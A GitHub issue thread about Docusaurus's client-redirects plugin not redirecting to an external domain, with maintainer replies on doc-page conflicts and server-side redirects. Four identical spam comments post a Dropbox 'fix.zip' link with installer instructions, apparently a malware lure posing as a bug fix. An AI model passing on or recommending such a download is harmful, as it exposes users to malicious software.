### ISSUE TITLE
[@docusaurus/plugin-client-redirects] Not working with external links

### ISSUE THREAD

**Issue by danieldelcore** [facebook/docusaurus#10447]
### Have you read the Contributing Guidelines on issues?

- [X] I have read the [Contributing Guidelines on issues](https://github.com/facebook/docusaurus/blob/main/CONTRIBUTING.md#issues).

### Prerequisites

- [X] I'm using the latest version of Docusaurus.
- [X] I have tried the `npm run clear` or `yarn clear` command.
- [X] I have tried `rm -rf node_modules yarn.lock package-lock.json` and re-installing packages.
- [X] I have tried creating a repro with https://new.docusaurus.io.
- [X] I have read the console error message carefully (if applicable).

### Description

Client redirects are not working for the following plugin config:

```
 plugins: [
    [
      '@docusaurus/plugin-client-redirects',
      {
        redirects: [
          {
            from: ['/'],
            to: 'https://www.hypermod.io/',
          },
          {
            from: ['/docs'],
            to: 'https://www.hypermod.io/docs',
          },
          {
            from: ['/docs/your-first-codemod'],
            to: 'https://www.hypermod.io/docs/guides/your-first-codemod',
          },
          {
            from: ['/docs/understanding-asts'],
            to: 'https://www.hypermod.io/docs/guides/understanding-asts',
          },
          {
            from: ['/docs/import-manipulation'],
            to: 'https://www.hypermod.io/docs/guides/import-manipulation',
          },
          {
            from: ['/docs/react'],
            to: 'https://www.hypermod.io/docs/guides/react-jsx',
          },
          {
            from: ['/docs/typescript'],
            to: 'https://www.hypermod.io/docs/guides/typescript',
          },
        ],
      },
    ],
  ],
```

Versions:

https://github.com/hypermod-io/hypermod-community/blob/5248c0e8c5cfd03d2417c3971a27bf3cb4e37af5/website/package.json#L17-L19

### Reproducible demo

https://www.codeshiftcommunity.com/docs/your-first-codemod

### Steps to reproduce

navigate to provided url, note that the page doesn't trigger a client redirect.

### Expected behavior

A client redirect offsite should be triggered
user should land on hypermod.io

### Actual behavior

User remains on current site

### Your environment

- Public source code: https://github.com/hypermod-io/hypermod-community/tree/main/website
- Public site URL: https://www.codeshiftcommunity.com/docs/your-first-codemod
- Docusaurus version used: ^3.4.0
- Environment name and version (e.g. Chrome 89, Node.js 16.4): any
- Operating system and version (e.g. Ubuntu 20.04.2 LTS): any

### Self-service

- [X] I'd be willing to fix this bug myself.

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by danieldelcore** [comment]
That seems perfectly safe and sensible

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Josh-Cena** [comment]
Do you have the docs plugin and the client redirects plugin creating the same URL...? That's not allowed, and the emit order is undefined. Either the client redirects plugin successfully creates a redirect HTML and no doc page is generated, or the doc page is generated and overwrites the redirect.

**Comment by danieldelcore** [comment]
Sorry @Josh-Cena, this is actually trying to create an off-site redirect from `codeshiftcommunity.com` to => `hypermod.io`
Not sure if i made that clear in my issue report. I saw a GH issue somewhere saying this is supported in the current version of the plugin but i can't seem to find it now

**Comment by slorber** [comment]
@danieldelcore if your site has a doc at `/docs/xyz` then the redirect plugin will not override an existing doc page. Your CI tells you so (and you have broken anchors to fix too)

https://github.com/hypermod-io/hypermod-community/actions/runs/9932343103/job/27433520875

![CleanShot 2024-08-26 at 09 48 56](https://github.com/user-attachments/assets/021ee0ec-9037-4bf4-812f-dbe3396c4f22)


---


What's the point of using a client redirect plugin to redirect from one domain to another?

You'd rather use your server provider features directly instead of Docusaurus

Apparently, you use GitHub Pages which doesn't provide server-side redirects, so:
- better solution: use a CDN on top like Cloudflare and add the domain server redirect there
- worse solution: [create an `index.html` page with a client-redirect yourself](https://theorangeone.net/posts/redirecting-static-pages/)

In any case, there's no point in building the Docusaurus site on the old domain if you always plan to redirect it to the new domain. The 2 deployments do not have to be the same, you can have a redirect deployment on the old domain and a Docusaurus site on your new domain.

I would encourage you to migrate from GitHub pages to a free provider that supports server redirects out of the box: Vercel, Netlify, Cloudflare...

**Comment by LauraXia123** [comment]
@slorber Do you have to fix the broken anchors for the redirects configuration to take effect?

**Comment by OzakIOne** [comment]
I don't know if it is required to fix the links for the redirect to work but there is no point of not fixing broken links

**Comment by slorber** [comment]
If you use server redirects, no docusaurus code is even loaded so you can even fully delete your docusaurus site from the original domain you redirect from and it will still work. 

This is not related to docusaurus, this is how the web works.
